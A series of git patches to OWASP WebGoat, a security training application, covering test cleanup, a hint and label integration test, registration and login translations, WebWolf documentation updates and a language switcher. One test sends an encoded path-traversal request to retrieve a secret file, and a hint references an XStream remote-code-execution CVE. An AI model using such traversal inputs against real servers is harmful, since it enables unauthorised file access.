+++ b/src/test/java/org/owasp/webgoat/container/service/LessonMenuServiceTest.java
@@ -98,7 +98,7 @@ public class LessonMenuServiceTest {
         when(userTrackerRepository.findByUser(any())).thenReturn(userTracker);
 
         mockMvc.perform(MockMvcRequestBuilders.get(URL_LESSONMENU_MVC))
-                .andExpect(status().isOk()).andDo(print())
+                .andExpect(status().isOk())//.andDo(print())
                 .andExpect(jsonPath("$[0].children[0].complete", CoreMatchers.is(true)));
     }
 }
diff --git a/src/test/java/org/owasp/webgoat/lessons/path_traversal/ProfileUploadRetrievalTest.java b/src/test/java/org/owasp/webgoat/lessons/path_traversal/ProfileUploadRetrievalTest.java
index da3e80194..77629dd5a 100644
--- a/src/test/java/org/owasp/webgoat/lessons/path_traversal/ProfileUploadRetrievalTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/path_traversal/ProfileUploadRetrievalTest.java
@@ -48,7 +48,7 @@ public class ProfileUploadRetrievalTest extends LessonTest {
         var uri = new URI("/PathTraversal/random-picture?id=%2E%2E%2F%2E%2E%2F");
         mockMvc.perform(get(uri))
                 .andExpect(status().is(404))
-                .andDo(MockMvcResultHandlers.print())
+                //.andDo(MockMvcResultHandlers.print())
                 .andExpect(content().string(containsString("path-traversal-secret.jpg")));
 
         //Retrieve the secret file (note: .jpg is added by the server)
diff --git a/src/test/java/org/owasp/webgoat/lessons/xxe/ContentTypeAssignmentTest.java b/src/test/java/org/owasp/webgoat/lessons/xxe/ContentTypeAssignmentTest.java
index 10d4d75cb..0e42b26e6 100644
--- a/src/test/java/org/owasp/webgoat/lessons/xxe/ContentTypeAssignmentTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/xxe/ContentTypeAssignmentTest.java
@@ -99,7 +99,7 @@ public class ContentTypeAssignmentTest extends LessonTest {
 
         mockMvc.perform(get("/xxe/comments").contentType(MediaType.APPLICATION_JSON))
                 .andExpect(status().isOk())
-                .andDo(MockMvcResultHandlers.print())
+                //.andDo(MockMvcResultHandlers.print())
                 .andExpect(jsonPath("$.[*]").value(Matchers.hasSize(numberOfComments)));
     }
 

From 7add1ef73e668b916f6ec49a1d83c43451c91fd8 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Ren=C3=A9=20Zubcevic?= <rene@zubcevic.com>
Date: Fri, 15 Jul 2022 12:44:37 +0200
Subject: [PATCH 157/227] hints tested (#1295)

---
 ....java => LabelAndHintIntegrationTest.java} | 51 +++++++++++++++++--
 1 file changed, 46 insertions(+), 5 deletions(-)
 rename src/it/java/org/owasp/webgoat/{LabelAndHintTest.java => LabelAndHintIntegrationTest.java} (55%)

diff --git a/src/it/java/org/owasp/webgoat/LabelAndHintTest.java b/src/it/java/org/owasp/webgoat/LabelAndHintIntegrationTest.java
similarity index 55%
rename from src/it/java/org/owasp/webgoat/LabelAndHintTest.java
rename to src/it/java/org/owasp/webgoat/LabelAndHintIntegrationTest.java
index 0724e9475..7ddc3b79a 100644
--- a/src/it/java/org/owasp/webgoat/LabelAndHintTest.java
+++ b/src/it/java/org/owasp/webgoat/LabelAndHintIntegrationTest.java
@@ -8,10 +8,12 @@ import org.junit.jupiter.api.Test;
 
 import java.io.FileInputStream;
 import java.io.InputStream;
+import java.util.List;
 import java.util.Properties;
 
-public class LabelAndHintTest extends IntegrationTest {
+public class LabelAndHintIntegrationTest extends IntegrationTest {
 
+    final static String ESCAPE_JSON_PATH_CHAR = "\'";
 
     @Test
     public void testSingleLabel() {
@@ -24,14 +26,40 @@ public class LabelAndHintTest extends IntegrationTest {
                 .cookie("JSESSIONID", getWebGoatCookie())
                 .get(url("service/labels.mvc")).then().statusCode(200).extract().jsonPath();
 
-        Assertions.assertEquals("Try again: but this time enter a value before hitting go.", jsonPath.getString("\'http-basics.close\'"));
+        Assertions.assertEquals("Try again: but this time enter a value before hitting go.", jsonPath.getString(ESCAPE_JSON_PATH_CHAR+"http-basics.close"+ESCAPE_JSON_PATH_CHAR));
+    }
+
+    @Test
+    public void testHints() {
+        JsonPath jsonPathLabels = getLabels("en");
+        List<String> allLessons = List.of(
+                "HttpBasics",
+                "HttpProxies", "CIA", "InsecureLogin", "Cryptography", "PathTraversal",
+                "XXE", "JWT", "IDOR", "SSRF", "WebWolfIntroduction", "CrossSiteScripting", "CSRF", "HijackSession",
+                "SqlInjection", "SqlInjectionMitigations" ,"SqlInjectionAdvanced",
+                "Challenge1");
+        for (String lesson: allLessons) {
+            startLesson(lesson);
+            List<String> hintKeys = getHints();
+            for (String key : hintKeys) {
+                String keyValue = jsonPathLabels.getString(ESCAPE_JSON_PATH_CHAR + key + ESCAPE_JSON_PATH_CHAR);
+                //System.out.println("key: " + key + " ,value: " + keyValue);
+                Assertions.assertNotNull(keyValue);
+                Assertions.assertNotEquals(key, keyValue);
+            }
+        }
+        //Assertions.assertEquals("http-basics.hints.http_basics_lesson.1", ""+jsonPath.getList("hint").get(0));
     }
 
     @Test
     public void testLabels() {
 
+        JsonPath jsonPathLabels = getLabels("en");
         Properties propsDefault = getProperties("");
-        System.out.println("Working Directory = " + System.getProperty("user.dir"));
+        for (String key: propsDefault.stringPropertyNames()) {
+            String keyValue = jsonPathLabels.getString(ESCAPE_JSON_PATH_CHAR+key+ESCAPE_JSON_PATH_CHAR);
+            Assertions.assertNotNull(keyValue);
+        }
         checkLang(propsDefault,"nl");
         checkLang(propsDefault,"de");
         checkLang(propsDefault,"fr");
@@ -62,9 +90,9 @@ public class LabelAndHintTest extends IntegrationTest {
                 System.err.println("key: " + key + " in (" +lang+") is missing from default properties");
                 Assertions.fail();
             }
-            /*if (!jsonPath.getString("\'"+key+"\'").equals(propsLang.get(key))) {
+            /*if (!jsonPath.getString(ESCAPE_JSON_PATH_CHAR+key+ESCAPE_JSON_PATH_CHAR).equals(propsLang.get(key))) {
                 System.out.println("key: " + key + " in (" +lang+") has incorrect translation in label service");
-                System.out.println("actual:"+jsonPath.getString("\'"+key+"\'"));
+                System.out.println("actual:"+jsonPath.getString(ESCAPE_JSON_PATH_CHAR+key+ESCAPE_JSON_PATH_CHAR));
                 System.out.println("expected: "+propsLang.getProperty(key));
                 System.out.println();
                 //Assertions.fail();
@@ -86,4 +114,17 @@ public class LabelAndHintTest extends IntegrationTest {
                 .statusCode(200).extract().jsonPath();
     }
 
+    private List<String> getHints() {
+        JsonPath jsonPath = RestAssured.given()
+                .when()
+                .relaxedHTTPSValidation()
+                .contentType(ContentType.JSON)
+                .cookie("JSESSIONID", getWebGoatCookie())
+                .get(url("service/hint.mvc"))
+                .then()
+                //.log().all()
+                .statusCode(200).extract().jsonPath();
+        return jsonPath.getList("hint");
+    }
+
 }

From 9e3eb39069403a28c018399abce26ec9602b5679 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Ren=C3=A9=20Zubcevic?= <rene@zubcevic.com>
Date: Sat, 16 Jul 2022 06:53:39 +0200
Subject: [PATCH 158/227] removed one duplicate label key and made all login
 and register fields multi language (#1296)

---
 .../webgoat/LabelAndHintIntegrationTest.java  |  6 ++--
 src/main/resources/i18n/messages.properties   | 11 ++++++-
 .../resources/i18n/messages_nl.properties     | 17 +++++++++--
 .../i18n/WebGoatLabels.properties             |  3 +-
 .../resources/webgoat/templates/login.html    |  6 ++--
 .../webgoat/templates/registration.html       | 29 ++++++-------------
 6 files changed, 41 insertions(+), 31 deletions(-)

diff --git a/src/it/java/org/owasp/webgoat/LabelAndHintIntegrationTest.java b/src/it/java/org/owasp/webgoat/LabelAndHintIntegrationTest.java
index 7ddc3b79a..fb3b8488e 100644
--- a/src/it/java/org/owasp/webgoat/LabelAndHintIntegrationTest.java
+++ b/src/it/java/org/owasp/webgoat/LabelAndHintIntegrationTest.java
@@ -90,13 +90,13 @@ public class LabelAndHintIntegrationTest extends IntegrationTest {
                 System.err.println("key: " + key + " in (" +lang+") is missing from default properties");
                 Assertions.fail();
             }
-            /*if (!jsonPath.getString(ESCAPE_JSON_PATH_CHAR+key+ESCAPE_JSON_PATH_CHAR).equals(propsLang.get(key))) {
+            if (!jsonPath.getString(ESCAPE_JSON_PATH_CHAR+key+ESCAPE_JSON_PATH_CHAR).equals(propsLang.get(key))) {
                 System.out.println("key: " + key + " in (" +lang+") has incorrect translation in label service");
                 System.out.println("actual:"+jsonPath.getString(ESCAPE_JSON_PATH_CHAR+key+ESCAPE_JSON_PATH_CHAR));
                 System.out.println("expected: "+propsLang.getProperty(key));
                 System.out.println();
-                //Assertions.fail();
-            }*/
+                Assertions.fail();
+            }
         }
     }
 
diff --git a/src/main/resources/i18n/messages.properties b/src/main/resources/i18n/messages.properties
index 0c76dea40..ebac2bc2f 100644
--- a/src/main/resources/i18n/messages.properties
+++ b/src/main/resources/i18n/messages.properties
@@ -51,7 +51,7 @@ show.hints=Show hints
 lesson.overview=Lesson overview
 reset.lesson=Reset lesson
 sign.in=Sign in
-register.new=Register new user
+register.new=or register yourself as a new user
 sign.up=Sign up
 register.title=Register 
 
@@ -63,3 +63,12 @@ password.size=Password should at least contain 6 characters
 password.diff=The passwords do not match.
 security.enabled=Security enabled, you can try the previous challenges and see the effect!
 security.disabled=Security enabled, you can try the previous challenges and see the effect!
+termsofuse=Terms of use
+register.condition.1=While running this program your machine will be extremely vulnerable to attack.\
+  You should disconnect from the Internet while using this program. WebGoat's default configuration binds to localhost to minimize the exposure. 
+register.condition.2=This program is for educational purposes only. If you attempt \
+these techniques without authorization, you are very likely to get caught. If \
+you are caught engaging in unauthorized hacking, most companies will fire you. \
+Claiming that you were doing security research will not work as that is the \
+first thing that all hackers claim.
+terms.agree=Agree with the terms and conditions
diff --git a/src/main/resources/i18n/messages_nl.properties b/src/main/resources/i18n/messages_nl.properties
index 065b566ff..2f4dff687 100644
--- a/src/main/resources/i18n/messages_nl.properties
+++ b/src/main/resources/i18n/messages_nl.properties
@@ -22,13 +22,16 @@
 # projects.
 # <p>
 #
-lesson.completed=Gefeliciteerd, je hebt de les succesvol afgerond.
+lesson.completed=Gefeliciteerd, je hebt deze les succesvol afgerond.
+assignment.solved=Gefeliciteerd, je hebt deze opdracht succesvol afgerond.
+assignment.not.solved=Sorry de oplossing is niet correct, probeer het nog eens.
 RestartLesson=Herstart de les
 SolutionVideos=Video oplossingen
 ErrorGenerating=Fout opgetreden tijdens generatie
 InvalidData=Ongeldige invoer
 Go!=Ga snel aan de slag!
 password=Wachtwoord
+password.confirm=Herhaal wachtwoord
 username=Gebruikersnaam
 logged_out=Je bent succesvol uitgelogd.
 invalid_username_password=Ongeldige gebruikersnaam/wachtwoord combinatie
@@ -46,4 +49,14 @@ contact=Neem contact met ons op
 show.hints=Toon hints
 lesson.overview=Overzicht les
 reset.lesson=Herstart les
-sign.in=Log in
+sign.in=Inloggen
+terms.agree=Ik ga akkoord met de voorwaarden
+sign.up=Registreer
+register.title=Aanmelden als nieuwe gebruiker
+register.new=of aanmelden als nieuwe gebruiker
+termsofuse=Gebruiksvoorwaarden
+register.condition.1=Wanneer u WebGoat runt op uw computer, bent u kwetsbaar voor cyber aanvallen. \
+  Zorg dat u geen verbinding heeft met internet en dat toegang tot WebGoat alleen lokaal mogelijk is om het aanvalsoppervlak te verkleinen.
+register.condition.2=WebGoat is bedoeld als educatieve applicatie op het gebied van secure software development. \
+  Gebruik wat u leert om applicaties beter te maken en niet om zonder toestemming applicaties te schaden. \
+  In dat laatste geval loopt u risico op rechtsvervoling en ontslag. 
diff --git a/src/main/resources/lessons/vulnerable_components/i18n/WebGoatLabels.properties b/src/main/resources/lessons/vulnerable_components/i18n/WebGoatLabels.properties
index 87c13198c..a34913df0 100644
--- a/src/main/resources/lessons/vulnerable_components/i18n/WebGoatLabels.properties
+++ b/src/main/resources/lessons/vulnerable_components/i18n/WebGoatLabels.properties
@@ -1,7 +1,6 @@
 vulnerable-components.title=Vulnerable Components
 EnterYourName=Enter your Name
-Go!=Go!
 vulnerable.hint=Did you search for CVE-2013-728 and read https://x-stream.github.io/CVE-2013-7285.html
 vulnerable-components.close=The payload send could not be deserialized to a Contact class. Please try again.
 vulnerable-components.success=You successfully tried to exploit the CVE-2013-7285 vulnerability
-vulnerable-components.fromXML=You created contact {0}.  This means you did not exploit the remote code execution.
\ No newline at end of file
+vulnerable-components.fromXML=You created contact {0}.  This means you did not exploit the remote code execution.
diff --git a/src/main/resources/webgoat/templates/login.html b/src/main/resources/webgoat/templates/login.html
index 733bcd7c6..9e0940ae3 100644
--- a/src/main/resources/webgoat/templates/login.html
+++ b/src/main/resources/webgoat/templates/login.html
@@ -32,11 +32,11 @@
                 <div class="form-group">
                     <label for="exampleInputEmail1" th:text="#{username}">Username</label>
                     <input autofocus="dummy_for_thymeleaf_parser" type="text" class="form-control"
-                           id="exampleInputEmail1" placeholder="Username" name='username' />
+                           id="exampleInputEmail1" th:placeholder="#{username}" name='username' />
                 </div>
                 <div class="form-group">
                     <label for="exampleInputPassword1" th:text="#{password}">Password</label>
-                    <input type="password" class="form-control" id="exampleInputPassword1" placeholder="Password"
+                    <input type="password" class="form-control" id="exampleInputPassword1" th:placeholder="#{password}"
                            name='password' />
                 </div>
                 <button class="btn btn-primary btn-block" type="submit" th:text="#{sign.in}">Sign in</button>
@@ -49,4 +49,4 @@
 
 
 </body>
-</html>
\ No newline at end of file
+</html>
diff --git a/src/main/resources/webgoat/templates/registration.html b/src/main/resources/webgoat/templates/registration.html
index fc8a4e517..cf9b8a69f 100644
--- a/src/main/resources/webgoat/templates/registration.html
+++ b/src/main/resources/webgoat/templates/registration.html
@@ -31,14 +31,14 @@
                         <div class="col-sm-4">
                             <input autofocus="dummy_for_thymeleaf_parser" type="text" class="form-control"
                                    th:field="*{username}"
-                                   id="username" placeholder="Username" name='username'/>
+                                   id="username" th:placeholder="#{username}" name='username'/>
                         </div>
                         <span th:if="${#fields.hasErrors('username')}" th:errors="*{username}">Username error</span>
                     </div>
                     <div class="form-group" th:classappend="${#fields.hasErrors('password')}? 'has-error'">
                         <label for="password" class="col-sm-2 control-label" th:text="#{password}">Password</label>
                         <div class="col-sm-4">
-                            <input type="password" class="form-control" id="password" placeholder="Password"
+                            <input type="password" class="form-control" id="password" th:placeholder="#{password}"
                                    name='password' th:value="*{password}"/>
                         </div>
                         <span th:if="${#fields.hasErrors('password')}" th:errors="*{password}">Password error</span>
@@ -47,7 +47,7 @@
                         <label for="matchingPassword" class="col-sm-2 control-label" th:text="#{password.confirm}">Confirm
                             password</label>
                         <div class="col-sm-4">
-                            <input type="password" class="form-control" id="matchingPassword" placeholder="Password"
+                            <input type="password" class="form-control" id="matchingPassword" th:placeholder="#{password}"
                                    name='matchingPassword' th:value="*{matchingPassword}"/>
                         </div>
                         <span th:if="${#fields.hasErrors('matchingPassword')}" th:errors="*{matchingPassword}">Password error</span>
@@ -55,22 +55,11 @@
                     </div>
 
                     <div class="form-group" th:classappend="${#fields.hasErrors('agree')}? 'has-error'">
-                        <label class="col-sm-2 control-label">Terms of use</label>
+                        <label class="col-sm-2 control-label" th:text="#{termsofuse}">Terms of use</label>
                         <div class="col-sm-6">
                             <div style="border: 1px solid #e5e5e5; height: 200px; overflow: auto; padding: 10px;">
-                                <p>
-                                    While running this program your machine will be extremely
-                                    vulnerable to attack. You should disconnect from the Internet while using
-                                    this program. WebGoat's default configuration binds to localhost to minimize
-                                    the exposure.
-                                </p>
-                                <p>
-                                    This program is for educational purposes only. If you attempt
-                                    these techniques without authorization, you are very likely to get caught. If
-                                    you are caught engaging in unauthorized hacking, most companies will fire you.
-                                    Claiming that you were doing security research will not work as that is the
-                                    first thing that all hackers claim.
-                                </p>
+                                <p th:text="#{register.condition.1}" >Condition1</p>
+                                <p th:text="#{register.condition.2}">Condition2</p>
                             </div>
                         </div>
                     </div>
@@ -79,8 +68,8 @@
                         <div class="col-sm-6 col-sm-offset-2">
                             <div class="checkbox">
                                 <label>
-                                    <input type="checkbox" name="agree" value="agree"/>Agree with the terms and
-                                    conditions
+                                    <input type="checkbox" name="agree" value="agree"/><p th:text="#{terms.agree}">Agree with the terms and
+                                    conditions</p>
                                 </label>
                             </div>
                         </div>
@@ -99,4 +88,4 @@
 
 
 </body>
-</html>
\ No newline at end of file
+</html>

From fe7774bb6f854824b3eac8bb7e78073aafa99722 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Mon, 18 Jul 2022 10:34:54 +0200
Subject: [PATCH 159/227] Update documentation regarding WebWolf

WebWolf no longer runs as a separate application we can simplify the description.
---
 README.md                                     |  2 +-
 .../documentation/IntroductionWebWolf.adoc    | 20 ++-----------------
 2 files changed, 3 insertions(+), 19 deletions(-)

diff --git a/README.md b/README.md
index a5538a40a..8990a816d 100644
--- a/README.md
+++ b/README.md
@@ -47,7 +47,7 @@ docker run -it -p 127.0.0.1:8080:8080 -p 127.0.0.1:9090:9090 -e TZ=Europe/Amster
 
 ## 2. Standalone
 
-Download the latest WebGoat and WebWolf release from [https://github.com/WebGoat/WebGoat/releases](https://github.com/WebGoat/WebGoat/releases)
+Download the latest WebGoat release from [https://github.com/WebGoat/WebGoat/releases](https://github.com/WebGoat/WebGoat/releases)
 
 ```shell
 java -Dfile.encoding=UTF-8 -jar webgoat-8.2.3.jar 
diff --git a/src/main/resources/lessons/webwolf_introduction/documentation/IntroductionWebWolf.adoc b/src/main/resources/lessons/webwolf_introduction/documentation/IntroductionWebWolf.adoc
index b29ae401a..a71cb1a66 100644
--- a/src/main/resources/lessons/webwolf_introduction/documentation/IntroductionWebWolf.adoc
+++ b/src/main/resources/lessons/webwolf_introduction/documentation/IntroductionWebWolf.adoc
@@ -1,8 +1,7 @@
 == Introducing WebWolf
 
 You only need WebWolf if a lesson specifies you can use it. For a lot of lessons you use WebGoat without
-starting WebWolf. If you need to do an exercise with WebWolf make sure it is running alongside WebGoat. Lessons
-where you can use WebWolf are marked with the following icon (top right in assignment):
+starting WebWolf. Lessons where you can use WebWolf are marked with the following icon (top right in assignment):
 
 {nbsp}
 
@@ -13,7 +12,7 @@ image::images/wolf-enabled.png[width=115,height=128]
 Even if the icon is present, you are not obliged to use WebWolf, you can also use any intercepting tool you like.
 (`netcat` etc.)
 
-WebWolf is a separate web application which simulates an attacker's machine. It makes it possible for us to
+WebWolf opens in a new browser tab and is a separate web application which simulates an attacker's machine. It makes it possible for us to
 make a clear distinction between what takes place on the attacked website and the actions you need to do as
 an "attacker". WebWolf was introduced after a couple of workshops where we received feedback that there
 was no clear distinction between what was part of the "attackers" role and what was part of the "users" role on the
@@ -23,18 +22,3 @@ website. The following items are supported in WebWolf:
 * Receiving email
 * Landing page for incoming requests
 
-WebWolf runs as a separate web application. If you are using the Docker-compose file you can just point your browser webWolfLink:here[] to open WebWolf.
-If you want to use the standalone version, you will need to download the jar file and start it:
-
-```
-java -jar webwolf-<<version>>.jar [--server.port=9090] [--server.address=localhost]
-```
-
-By default WebWolf starts on port 9090 with `--server.port` you can specify a different port. With `server.address` you
-can bind it to a different address (default localhost)
-
-Note: if you start WebGoat as standalone application you need to start WebWolf as standalone application as well.
-
-
-This will start the application on port 9090, click webWolfLink:here[] to open WebWolf.
-The first thing you need to do is login with the user you registered on WebGoat.

From 2aa3609461196630072f03ce457a049a635f8ee1 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Mon, 18 Jul 2022 17:02:37 +0200
Subject: [PATCH 160/227] Fix typo

---
 src/main/resources/webwolf/templates/home.html | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/src/main/resources/webwolf/templates/home.html b/src/main/resources/webwolf/templates/home.html
index c462cc2d3..2d7007564 100644
--- a/src/main/resources/webwolf/templates/home.html
+++ b/src/main/resources/webwolf/templates/home.html
@@ -18,7 +18,7 @@
             <br/>
             <p>
                 Some challenges requires to have a local web server running. WebWolf is for you the attacker it
-                helps you while solving some of the assignments and challenges within
+                helps you while solving some assignments and challenges within
                 WebGoat. An assignment might for example require you to serve a file or connect back to your own
                 environment or to receive an e-mail.
                 In order to not let you run WebGoat open and connected to the internet we provided these tools in this

From ff965c83be2f46808add924edf831c7bbf8b9bd6 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Mon, 18 Jul 2022 17:05:29 +0200
Subject: [PATCH 161/227] Adjust year

---
 src/main/resources/webwolf/templates/fragments/footer.html | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/src/main/resources/webwolf/templates/fragments/footer.html b/src/main/resources/webwolf/templates/fragments/footer.html
index e7711a19d..44523a297 100644
--- a/src/main/resources/webwolf/templates/fragments/footer.html
+++ b/src/main/resources/webwolf/templates/fragments/footer.html
@@ -7,10 +7,10 @@
 
     <div class="container">
         <footer>
-            © 2021 WebGoat - Use WebWolf at your own risk
+            © 2022 WebGoat - Use WebWolf at your own risk
         </footer>
     </div>
 
 </div>
 </body>
-</html>
\ No newline at end of file
+</html>

From 24fcc8f321fffb8b3a2b78f3227218b5d0878f68 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Tue, 19 Jul 2022 21:03:05 +0200
Subject: [PATCH 162/227] Use starting instead of using.

---
 .../webwolf_introduction/documentation/IntroductionWebWolf.adoc | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/src/main/resources/lessons/webwolf_introduction/documentation/IntroductionWebWolf.adoc b/src/main/resources/lessons/webwolf_introduction/documentation/IntroductionWebWolf.adoc
index a71cb1a66..94f85602e 100644
--- a/src/main/resources/lessons/webwolf_introduction/documentation/IntroductionWebWolf.adoc
+++ b/src/main/resources/lessons/webwolf_introduction/documentation/IntroductionWebWolf.adoc
@@ -1,7 +1,7 @@
 == Introducing WebWolf
 
 You only need WebWolf if a lesson specifies you can use it. For a lot of lessons you use WebGoat without
-starting WebWolf. Lessons where you can use WebWolf are marked with the following icon (top right in assignment):
+using WebWolf. Lessons where you can use WebWolf are marked with the following icon (top right in assignment):
 
 {nbsp}
 

From 20dd3ffb95cfc1011fb364fdd2ee7e47d3c84042 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Ren=C3=A9=20Zubcevic?= <rene@zubcevic.com>
Date: Wed, 20 Jul 2022 10:52:48 +0200
Subject: [PATCH 163/227] Lang switch (#1297)

* language selector first steps

* language german intro added

* ascii doc lang attribute as additional option

* removed some commented code

* changed adoc resource loader to take into account the selected language

* added readme

* added lang test cases
---
 README_I18N.md                                |  34 ++
 .../webgoat/LabelAndHintIntegrationTest.java  |  40 ++
 .../AsciiDoctorTemplateResolver.java          |  53 +-
 .../webgoat/container/MvcConfiguration.java   |  29 +-
 .../webgoat/container/WebSecurityConfig.java  |   2 +
 .../webgoat/container/i18n/Language.java      |   2 -
 .../resources/i18n/messages_de.properties     |  11 +-
 .../documentation/Crypto_plan.adoc            |   8 +-
 .../documentation/Introduction.adoc           |   2 +
 .../documentation/Introduction_de.adoc        |  18 +
 .../documentation/Introduction_fr.adoc        |  18 +
 .../documentation/Introduction_nl.adoc        |  18 +
 .../webgoat/static/css/img/cnlang.svg         |  11 +
 .../webgoat/static/css/img/delang.svg         |   5 +
 .../webgoat/static/css/img/enlang.svg         |   7 +
 .../webgoat/static/css/img/eslang.svg         | 547 ++++++++++++++++++
 .../webgoat/static/css/img/frlang.svg         |   7 +
 .../webgoat/static/css/img/nllang.svg         |   5 +
 .../resources/webgoat/templates/main_new.html |  57 +-
 19 files changed, 853 insertions(+), 21 deletions(-)
 create mode 100644 README_I18N.md
 create mode 100644 src/main/resources/lessons/webgoat_introduction/documentation/Introduction_de.adoc
 create mode 100644 src/main/resources/lessons/webgoat_introduction/documentation/Introduction_fr.adoc
 create mode 100644 src/main/resources/lessons/webgoat_introduction/documentation/Introduction_nl.adoc
 create mode 100644 src/main/resources/webgoat/static/css/img/cnlang.svg
 create mode 100644 src/main/resources/webgoat/static/css/img/delang.svg
 create mode 100644 src/main/resources/webgoat/static/css/img/enlang.svg
 create mode 100644 src/main/resources/webgoat/static/css/img/eslang.svg
 create mode 100644 src/main/resources/webgoat/static/css/img/frlang.svg
 create mode 100644 src/main/resources/webgoat/static/css/img/nllang.svg

diff --git a/README_I18N.md b/README_I18N.md
new file mode 100644
index 000000000..ef14f191b
--- /dev/null
+++ b/README_I18N.md
@@ -0,0 +1,34 @@
+# Multi language support in WebGoat
+
+WebGoat is mainly written in English, but it does support multiple languages.
+
+## Default language selection
+
+1. Current supported languages are: en, fr, de, nl
+2. The primary language is based on the language setting of the browser.
+3. If the language is not in the list of supported language, the language is English
+4. Once logged in, you can switch between the supported languages using a language dropdown menu on the main page
+   1. After switching a language you are back at the Introduction page
+
+## Adding a new language
+
+The following steps are required when you want to add a new language
+
+1. Update [main_new.html](src/main/resources/webgoat/static/main_new.html)
+   1. Add the parts for showing the flag and providing the correct value for the flag= parameter
+2. 
+3. Add a flag image to src/main/resources/webgoat/static/css/img
+   1. See the main_new.html for a link to download flag resources
+4. Add a welcome page to the introduction lesson
+   1. Copy Introduction_.adoc to Introduction_es.adoc (if in this case you want to add Spanish)
+   2. Add a highlighted section that explains that most parts of WebGoat will still be in English and invite people to translate parts where it would be valuable
+5. Translate the main labels 
+   1. Copy messages.properties to messages_es.properties (if in this case you want to add Spanish)
+   2. Translate the label values
+6. Optionally translate lessons by
+   1. Adding lang specifc adoc files in documentation folder of the lesson
+   2. Adding WebGoatLabels.properties of a specific language if you want to
+7. Run mvn clean to see if the LabelAndHintIntegration test passes
+8. Run WebGoat and verify that your own language and the other languages work as expected
+
+If you only want to translate more for a certain language, you only need to do step 4-8
diff --git a/src/it/java/org/owasp/webgoat/LabelAndHintIntegrationTest.java b/src/it/java/org/owasp/webgoat/LabelAndHintIntegrationTest.java
index fb3b8488e..1f99c15e7 100644
--- a/src/it/java/org/owasp/webgoat/LabelAndHintIntegrationTest.java
+++ b/src/it/java/org/owasp/webgoat/LabelAndHintIntegrationTest.java
@@ -27,6 +27,46 @@ public class LabelAndHintIntegrationTest extends IntegrationTest {
                 .get(url("service/labels.mvc")).then().statusCode(200).extract().jsonPath();
 
         Assertions.assertEquals("Try again: but this time enter a value before hitting go.", jsonPath.getString(ESCAPE_JSON_PATH_CHAR+"http-basics.close"+ESCAPE_JSON_PATH_CHAR));
+
+        // check if lang parameter overrules Accept-Language parameter
+        jsonPath = RestAssured.given()
+                .when()
+                .relaxedHTTPSValidation()
+                .contentType(ContentType.JSON)
+                .header("Accept-Language","en")
+                .cookie("JSESSIONID", getWebGoatCookie())
+                .get(url("service/labels.mvc?lang=nl")).then().statusCode(200).extract().jsonPath();
+        Assertions.assertEquals("Gebruikersnaam", jsonPath.getString(ESCAPE_JSON_PATH_CHAR+"username"+ESCAPE_JSON_PATH_CHAR));
+
+        jsonPath = RestAssured.given()
+                .when()
+                .relaxedHTTPSValidation()
+                .contentType(ContentType.JSON)
+                .header("Accept-Language","en")
+                .cookie("JSESSIONID", getWebGoatCookie())
+                .get(url("service/labels.mvc?lang=de")).then().statusCode(200).extract().jsonPath();
+        Assertions.assertEquals("Benutzername", jsonPath.getString(ESCAPE_JSON_PATH_CHAR+"username"+ESCAPE_JSON_PATH_CHAR));
+
+        // check if invalid language returns english
+        jsonPath = RestAssured.given()
+                .when()
+                .relaxedHTTPSValidation()
+                .contentType(ContentType.JSON)
+                .header("Accept-Language","nl")
+                .cookie("JSESSIONID", getWebGoatCookie())
+                .get(url("service/labels.mvc?lang=xx")).then().statusCode(200).extract().jsonPath();
+        Assertions.assertEquals("Username", jsonPath.getString(ESCAPE_JSON_PATH_CHAR+"username"+ESCAPE_JSON_PATH_CHAR));
+
+        // check if invalid language returns english
+        jsonPath = RestAssured.given()
+                .when()
+                .relaxedHTTPSValidation()
+                .contentType(ContentType.JSON)
+                .header("Accept-Language","xx_YY")
+                .cookie("JSESSIONID", getWebGoatCookie())
+                .get(url("service/labels.mvc")).then().statusCode(200).extract().jsonPath();
+        Assertions.assertEquals("Username", jsonPath.getString(ESCAPE_JSON_PATH_CHAR+"username"+ESCAPE_JSON_PATH_CHAR));
+
     }
 
     @Test
diff --git a/src/main/java/org/owasp/webgoat/container/AsciiDoctorTemplateResolver.java b/src/main/java/org/owasp/webgoat/container/AsciiDoctorTemplateResolver.java
index 33e2b16a6..ebcc83fbe 100644
--- a/src/main/java/org/owasp/webgoat/container/AsciiDoctorTemplateResolver.java
+++ b/src/main/java/org/owasp/webgoat/container/AsciiDoctorTemplateResolver.java
@@ -31,26 +31,28 @@
 
 package org.owasp.webgoat.container;
 
+import io.undertow.util.Headers;
 import lombok.extern.slf4j.Slf4j;
 import org.asciidoctor.Asciidoctor;
 import org.asciidoctor.extension.JavaExtensionRegistry;
-import org.owasp.webgoat.container.asciidoc.OperatingSystemMacro;
-import org.owasp.webgoat.container.asciidoc.UsernameMacro;
-import org.owasp.webgoat.container.asciidoc.WebGoatTmpDirMacro;
-import org.owasp.webgoat.container.asciidoc.WebGoatVersionMacro;
-import org.owasp.webgoat.container.asciidoc.WebWolfMacro;
-import org.owasp.webgoat.container.asciidoc.WebWolfRootMacro;
+import org.owasp.webgoat.container.asciidoc.*;
+import org.owasp.webgoat.container.i18n.Language;
 import org.springframework.core.io.ResourceLoader;
+import org.springframework.web.context.request.RequestContextHolder;
+import org.springframework.web.context.request.ServletRequestAttributes;
+import org.springframework.web.servlet.i18n.SessionLocaleResolver;
 import org.thymeleaf.IEngineConfiguration;
 import org.thymeleaf.templateresolver.FileTemplateResolver;
 import org.thymeleaf.templateresource.ITemplateResource;
 import org.thymeleaf.templateresource.StringTemplateResource;
 
+import javax.servlet.http.HttpServletRequest;
 import java.io.IOException;
 import java.io.InputStream;
 import java.io.InputStreamReader;
 import java.io.StringWriter;
 import java.util.HashMap;
+import java.util.Locale;
 import java.util.Map;
 import java.util.Set;
 
